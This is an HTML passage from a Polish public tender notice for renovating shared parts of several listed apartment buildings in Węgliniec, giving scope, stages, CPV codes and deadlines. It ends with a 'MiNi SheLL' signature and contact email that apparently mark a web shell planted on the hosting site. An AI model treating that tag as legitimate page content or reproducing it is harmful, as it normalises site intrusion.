f) Wymiana podłogi na strychu: rozebranie podłogi na stropie drewnianym, położenie nowej podłogi z płyt OSB.
3.9.2. Zakres robót w budynku przy ul. K. Wojtyły 29:
a) wymiana pokrycia dachowego zgodnie z przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
b) wymiana okien zespolonych (3 szt.) zgodnie z  przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
c) wymiana drzwi wejściowych (2szt.) zgodnie przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
d) remont klatki schodowej zgodnie z przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
3.9.3. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.19.00-3, 45.31.12.00-2, 45.42.11.00-5, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE X - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec - Kolejowa 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) odnowienie dachu z wymianą pokrycia połaci dachowej (336,92m2): rozbiórka pokrycia z papy,  rozebranie  rynien i rur spustowych z blachy nie nadającej się do użytku, przemurowanie przewodów kominowych i wentylacyjnych, obróbki blacharskie, łacenie i pokrycie dachu blachodachówką z blachy powlekanej, dwukrotne malowanie starych podbitek z desek, uzupełnienie włazów kominowych, płotek przeciwśniegowy, montaż rynien i rur spustowych z blachy ocynkowanej, montaż zbiorniczków przy rynnach
b) remont instalacji elektrycznej: wymiana tablic rozdzielczych, demontaż starych przewodów i osprzętu, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem,
c) wykonanie instalacji domofonu cyfrowego (centralka domofonu szt. 1, unifon - 8 szt., zasilacz domofonu, przewód domofonowy,
d) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków, gruntowanie powierzchni wewnętrznych, dwukrotne malowanie ścian i sufitów farbą emulsyjną, dwukrotne malowanie lamperii farbą olejną,
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.10.00-4, 45.31.12.00-2, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZADANIE XI - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Kolejowa 10 Węgliniec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) odnowienie dachu z wymianą pokrycia połaci dachowej (264m2): rozbiórka pokrycia z dachówki karpiówki, rozebranie łat, rozebranie  rynien i rur spustowych z blachy nie nadającej się do użytku, rozebranie kominów wolnostojących, przemurowanie przewodów kominowych i wentylacyjnych, obróbki blacharskie, łacenie i pokrycie dachu dachówką karpiówką, uzupełnienie włazów kominowych, płotek przeciwśniegowy, ławy kominiarskie, montaż rynien i rur spustowych z blachy ocynkowanej, montaż zbiorniczków przy rynnach
b) remont instalacji elektrycznej: wymiana tablic rozdzielczych, demontaż starych przewodów i osprzętu, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem ,
c) wymiana drzwi zewnętrznych - 1 szt. (wymiana drzwi, montaż elektrozaczepu  samozamykacza, naprawa progu)
d) wymiana zewnętrznej stolarki okiennej klatki schodowej - 1 szt. 
e) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków, gruntowanie powierzchni wewnętrznych, dwukrotne malowanie ścian i sufitów farbą emulsyjną, dwukrotne malowanie lamperii farbą olejną, naprawa schodów i posadzek oraz jednokrotne malowanie schodów drewnianych farbą olejną,
f) Wykonanie instalacji domofonu cyfrowego (centralka domofonu szt. 1, unifon - 5 szt., zasilacz domofonu, przewód domofonowy
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.10.00-4, 45.31.12.00-2, 45.42.11.00-5, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZADANIE XII - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Wojska Polskiego 11 w Węglińcu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont dachu z wymianą pokrycia połaci dachowej (550,52m2): rozbiórka pokrycia z dachówki karpiówki, rozebranie łat, rozebranie  rynien i rur spustowych z blachy nie nadającej się do użytku,  przemurowanie przewodów kominowych i wentylacyjnych, obróbki blacharskie, łacenie i pokrycie dachu dachówką karpiówką, uzupełnienie włazów kominowych, płotek przeciwśniegowy, ławy kominiarskie, montaż rynien i rur spustowych z blachy ocynkowanej, montaż zbiorniczków przy rynnach,
b) izolacja przeciwwilgociowa fundamentów
c) remont elewacji budynku z dociepleniem: przygotowanie starego podłoża pod ocieplenie metodą lekkomokrą (380m2), docieplenie ścian z cegły płytami styropianowymi klejonymi do podłoża, wykonanie wyprawy elewacyjnej akrylowej barwionej wraz z obróbkami okien i gzymsów, wykonanie wyprawy elewacyjnej cokołów tynkiem żywicznym,  
d) wymiana drzwi zewnętrznych - 2 szt.
e) wymiana zewnętrznej stolarki okiennej klatki schodowej - 3 szt. 
f) remont klatki schodowej: częściowe skucie i uzupełnienie starych tynków, gruntowanie powierzchni wewnętrznych, dwukrotne malowanie ścian i sufitów farbą emulsyjną, dwukrotne malowanie lamperii farbą olejną, naprawa schodów i posadzek oraz jednokrotne malowanie schodów drewnianych farbą olejną,
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.10.00-4, 45.32.00.00-6, 45.42.11.00-5, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZADANIE XIII - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. W. Polskiego 12 w Węglińcu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont elewacji budynku z dociepleniem: uzupełnienie tynków zewnętrznych kat. II, przygotowanie starego podłoża pod ocieplenie metodą lekkomokrą (256m2), docieplenie ścian z cegły płytami styropianowymi klejonymi do podłoża (256m2), wykonanie wyprawy elewacyjnej akrylowej wraz z obróbkami okien i gzymsów (216m2), wykonanie wyprawy elewacyjnej żywicznej cokołu (40m2) - zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji oraz montaż parapetów zewnętrznych z PCV (32m);
b) remont instalacji elektrycznej: demontaż starych przewodów i osprzętu, montaż przewodu zasilającego budynek od izolatorów linii napowietrznej ZK - YKY 5x16mm2 dł. 25m, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem (oprawy oświetleniowe wewnętrzne - 4 szt.; wyłączniki schodowe 5 szt.), wykonanie instalacji oświetlenia piwnic i strychu wraz z osprzętem (przewód 3x1,5mm2 - 30m; oprawy oświetleniowe - 3 szt.; wyłączniki podtynkowe - 2 szt.)
c) wymiana drzwi zewnętrznych - 1 szt. (wymiar 1,2x2,2 m)
d) wymiana zewnętrznej stolarki okiennej klatki schodowej - 2 szt.  (wymiar 1,05x1,7 m)
e) remont dachu: rozebranie starych przewodów dymowych i wentylacyjnych do powierzchni dachu oraz wymurowanie nowych z cegły klinkierowej (2,5m3),  pokrycie dachu papą termozgrzewalną - 1 warstwa (132m2) 
f) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków (30m2), wykonanie tynków gipsowych na ścianach i suficie (260m2), malowanie ścian i sufitów farbą emulsyjną (183m2), malowanie lamperii i balustrad farbą olejną (91m2), naprawa podestów betonowych i ułożenie płytek ceramicznych (20m2)
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.31.12.00-3, 45.42.11.00-5, 45.26.10.00-4, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com